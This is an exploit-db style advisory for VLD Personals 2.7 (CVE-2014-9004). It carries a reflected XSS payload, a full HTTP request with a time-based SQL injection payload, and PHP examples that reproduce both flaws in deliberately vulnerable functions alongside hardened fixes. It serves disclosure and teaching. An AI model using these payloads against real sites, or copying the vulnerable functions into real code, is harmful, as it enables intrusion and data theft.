VLDPersonal Bug Bounty


# Exploit Title: VLD Personals – Multiple Vulnerabilities
# Date: 09/11/2014
# Exploit Author: Talib Osmani
# Exploit Author's Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Version: 2.7
# CVE: CVE-2014-9004
# Exploit-db: http://www.exploit-db.com/exploits/35193/
# Fixed Version: 2.7.1
# Tested on: Windows / Linux

Cross-Site Scripting (reflected)
Issue detail:

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9314c"><script>alert(1)</script>a7ec313g818 was submitted in the id parameter. This input was echoed unmodified in the application's response: the double quote closes the attribute, the > closes the tag, and the script element is then parsed as markup. This proof-of-concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request:

GET /index.php?m=member_profile&p=profile&id=9314c"><script>alert(1)<%2fscript>a7ec313g818 HTTP/1.1
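The following PHP is an added example, not VLD Personals code: it reproduces the attribute-context reflection described above and shows the fix. The form markup, the profile_form_* and esc_attr function names, and the way the id parameter is read are assumptions; the page only shows that the value is reflected unmodified inside a double-quoted attribute.

```php
<?php
// Added example, not VLD Personals code. The template markup and the way the
// id parameter is read are assumed; the advisory only shows that the value
// is reflected unmodified inside a double-quoted attribute.

// Vulnerable pattern: the raw parameter lands inside value="...". The payload
// 9314c"><script>alert(1)</script>a7ec313g818 closes the attribute and the tag,
// so the browser parses the script element as markup.
function profile_form_vulnerable(string $id): string
{
    return '<form action="index.php" method="get">'
         . '<input type="hidden" name="id" value="' . $id . '">'
         . '</form>';
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES entity-encodes
// both " and ' so neither quoting style can be closed early; ENT_SUBSTITUTE
// replaces invalid UTF-8 instead of making htmlspecialchars() return "" and
// silently drop the value.
function esc_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function profile_form_fixed(string $id): string
{
    return '<form action="index.php" method="get">'
         . '<input type="hidden" name="id" value="' . esc_attr($id) . '">'
         . '</form>';
}

// Where id is supposed to be a numeric member id, also reject anything that is
// not all digits before it reaches the template. Output encoding is the last
// line of defence, not a substitute for input validation.
function member_id_or_null(?string $raw): ?int
{
    return $raw !== null && ctype_digit($raw) ? (int) $raw : null;
}

// Constructed input: the exact payload from the advisory.
$payload = '9314c"><script>alert(1)</script>a7ec313g818';
echo profile_form_vulnerable($payload), "\n";
echo profile_form_fixed($payload), "\n";
var_dump(member_id_or_null($payload));
var_dump(member_id_or_null('9314'));
```

Run it with php from the command line and compare the two form strings. Note that esc_attr() is only correct for HTML attribute and element content; a value placed inside a script block, an event handler or a URL needs the encoding for that context instead.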


SQL Injection:

Issue detail:

The country, gender1 and gender2 parameters appear to be vulnerable to SQL injection. The payload 1 and benchmark(20000000,sha1(1))-- (followed by a space, which MySQL requires after the -- comment marker) was submitted in the country parameter. The application took 11530 milliseconds to respond to the request, compared with 301 milliseconds for the original request, indicating that the injected SQL command was executed by the database and caused a time delay. The parameter is used in a numeric context: no closing quote is needed to break out of the query.
Request:

POST /index.php?m=search HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtfsdsdod3hc1q4dgngfz232htg2s2; sessdata=0

age_from=19&age_to=19&issearch=1&submit=Search&gender1=2&gender2=2&type_id=members&country=1%20and%20benchmark(20000000%2csha1(1))--%20
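The following PHP is an added example, not VLD Personals code: it reproduces the numeric injection point in the search parameters above against an in-memory SQLite table so that it runs offline, and shows the prepared-statement fix. The members table, its column names, the query shape and the search_* function names are assumptions. Because benchmark() and sha1() from the advisory's payload are MySQL-specific, the vulnerable query is demonstrated here with a data-extracting variant of the same numeric injection (1 OR 1=1 -- ) rather than the timing one; the injection point and the fix are the same. Requires the pdo_sqlite extension.

```php
<?php
// Added example, not VLD Personals code. Table, columns and query shape are
// assumed; the advisory only shows that the country/gender parameters reach
// the SQL layer unescaped in a numeric context.

function connect(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ]);
    $db->exec('CREATE TABLE members (member_id INTEGER PRIMARY KEY, '
            . 'country INTEGER, gender INTEGER, age INTEGER)');
    // Constructed sample rows.
    $db->exec('INSERT INTO members VALUES (1, 1, 2, 19), (2, 44, 1, 30), (3, 44, 2, 19)');
    return $db;
}

// Vulnerable: the search parameters are interpolated into the SQL text.
// On MySQL this is exactly what lets "1 and benchmark(20000000,sha1(1))-- "
// run; here "1 OR 1=1 -- " turns the rest of the WHERE clause into a comment.
function search_vulnerable(PDO $db, array $p): array
{
    $sql = "SELECT member_id FROM members WHERE country = {$p['country']}"
         . " AND gender = {$p['gender1']}"
         . " AND age BETWEEN {$p['age_from']} AND {$p['age_to']}";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: validate the type up front and bind every value as an integer.
// The value never becomes part of the SQL text, so a payload is simply an
// invalid integer rather than a query fragment.
function search_fixed(PDO $db, array $p): array
{
    foreach (['country', 'gender1', 'age_from', 'age_to'] as $k) {
        if (!isset($p[$k]) || !ctype_digit((string) $p[$k])) {
            throw new InvalidArgumentException("$k must be a non-negative integer");
        }
    }
    $stmt = $db->prepare(
        'SELECT member_id FROM members WHERE country = :country'
        . ' AND gender = :gender AND age BETWEEN :lo AND :hi'
    );
    $stmt->bindValue(':country', (int) $p['country'], PDO::PARAM_INT);
    $stmt->bindValue(':gender', (int) $p['gender1'], PDO::PARAM_INT);
    $stmt->bindValue(':lo', (int) $p['age_from'], PDO::PARAM_INT);
    $stmt->bindValue(':hi', (int) $p['age_to'], PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = connect();
// Constructed inputs: a legitimate search and the same search with the
// country parameter replaced by an injection at the advisory's injection point.
$honest = ['country' => '44', 'gender1' => '2', 'age_from' => '19', 'age_to' => '19'];
$hostile = $honest;
$hostile['country'] = '1 OR 1=1 -- ';

print_r(search_vulnerable($db, $honest));
print_r(search_vulnerable($db, $hostile));
print_r(search_fixed($db, $honest));
try {
    search_fixed($db, $hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

When the same fix is applied against MySQL, also set PDO::ATTR_EMULATE_PREPARES to false on the connection so the driver uses server-side prepared statements and sends parameters separately from the SQL text rather than quoting them client-side.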